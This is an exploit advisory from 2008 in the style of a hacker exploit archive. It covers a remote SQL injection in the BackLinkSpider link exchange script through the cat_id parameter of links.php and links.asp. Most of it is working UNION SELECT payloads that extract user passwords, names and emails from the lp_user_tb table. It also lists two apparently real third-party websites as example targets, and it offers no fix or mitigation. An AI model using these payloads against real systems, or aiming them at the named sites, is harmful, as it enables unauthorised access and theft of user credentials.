[~]----------------------------------------------------------------------------------------------------------------------------------------------------- [~] [~] BackLinkSpider - Exchange links Script (links.asp?cat_id) and (links.php?cat_id) Remote SQL Injection Vulnerability [~] [~] http://www.backlinkspider.com [~] [~] [~] ---------------------------------------------------------------------------------------------------------------------------------------------------- [~] Bug founded by d3v1l [Avram Marius] [~] [~] Date: 20.11.2008 [~] [~] [~] d3v1l@spoofer.com http://security-sh3ll.com [~] [~] ---------------------------------------------------------------------------------------------------------------------------------------------------- [~] Greetz tO ALL:- [~] [~] Security-Shell Members ( http://security-sh3ll.com/forum.php ) [~] [~] milw0rm <-> packetstorm Staff [~]----------------------------------------------------------------------------------------------------------------------------------------------------- [~] Exploit :- [~] [~] http://site.com/links.php?cat_id=-1 UNION SELECT 1,2,3,4,5,6,concat(password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20 from lp_user_tb-- [~] -1 UNION SELECT 1,2,3,4,5,6,concat(fname,0x3a,password,0x3a,email),8,9,10,11,12,13,14,15,16,17,18,19,20 from lp_user_tb-- [~] [~]------------------------------------------------------------------------------------------------------------------------------------------------------ [~] [~] Example :- [~] [~] links.asp?cat_id= -> http://www.champagneandchocolates.com/links.asp?cat_id=SQL [~] [~] [~] links.php?cat_id= -> http://www.quad-center.it/links.php?cat_id==SQL [~] [~] [~]-------------------------------------------------------------------------------------------------------------------------------------------------------